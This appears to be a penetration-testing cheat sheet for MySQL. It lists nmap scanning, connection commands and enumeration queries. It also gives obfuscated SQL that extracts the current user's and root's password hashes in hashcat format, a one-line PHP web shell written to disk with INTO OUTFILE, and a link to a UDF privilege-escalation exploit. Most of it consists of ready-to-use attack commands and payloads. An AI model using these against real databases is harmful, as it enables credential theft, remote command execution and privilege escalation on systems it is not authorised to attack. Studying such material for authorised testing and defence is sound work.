README.md

MySQL enumeration and exploitation

• Initial enumeration
• Connecting to a MySQL database
• Enumerating a database
• Saving anything to a file
• UDF PrivEsc

Initial enumeration

nmap -vv -p 3306 -sT --script=+mysql* <ip>

Connecting to a MySQL database

• Connect to a database using mysql client:

mysql -u <username> -p<no_space_before_password> -h <ip> -P 3306 <database> 

• Connect using mysqlsh (X Protocol):

mysqlsh --mysqlx -u <username> -p<no_space_before_password> -h <ip> -P 33060 -D <database>

Enumerating a database

• Get version:

SELECT @@version;

• Get current database:

SELECT database();

• Get current user:

SELECT current_user();

• Get current user's password hash:

SELECT password FROM mysql.user WHERE user=left(current_user(),locate(char(064),current_user())-1) AND convert(host USING UTF8)=substring(current_user(),locate(char(064),current_user())+1,255); -- Some databases still use password column
SELECT authentication_string FROM mysql.user WHERE user=left(current_user(),locate(char(064),current_user())-1) AND convert(host USING UTF8)=substring(current_user(),locate(char(064),current_user())+1,255);
SELECT concat(concat(char(036),char(109),char(121),char(115),char(113),char(108)),left(authentication_string,6),char(042),insert(hex(substring(authentication_string,8)),41,0,char(042))) FROM mysql.user WHERE user=left(current_user(),locate(char(064),current_user())-1) AND convert(host USING UTF8)=substring(current_user(),locate(char(064),current_user())+1,255); -- A current user's password hash encoded for the 7401 hashcat mode. Use this if a password hash has non-ASCII characters.

• List all users:

SELECT user FROM mysql.user ORDER BY 1;

• Get default user's password hash:

SELECT password FROM mysql.user WHERE lower(user)=concat(char(114),char(111),char(111),char(116)); -- "root" user. Some databases still use password column
SELECT authentication_string FROM mysql.user WHERE lower(user)=concat(char(114),char(111),char(111),char(116)); -- "root" user.
SELECT concat(concat(char(036),char(109),char(121),char(115),char(113),char(108)),left(authentication_string,6),char(042),insert(hex(substring(authentication_string,8)),41,0,char(042))) FROM mysql.user WHERE lower(user)=concat(char(114),char(111),char(111),char(116)); -- A root user's password hash encoded for the 7401 hashcat mode. Use this if a password hash has non-ASCII characters.

• List tables:

SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1;

• List table columns:

SELECT column_name FROM information_schema.columns WHERE table_name='<table_name>' ORDER BY 1;

• Search for %user% like tables:

SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE concat(char(37),char(117),char(115),char(101),char(114),char(37)) ORDER BY 1 LIMIT 1 OFFSET 0;

Saving anything to a file

• Usually MySQL has permissions to write into the /var/lib/mysql folder:

select '<?php system($_GET[\'c\']); ?>' into outfile '/var/lib/mysql/cmd.php';

UDF PrivEsc

• Check if MySQL demon is running as root.
• Compile this exploit: https://raw.githubusercontent.com/1N3/PrivEsc/master/mysql/raptor_udf2.c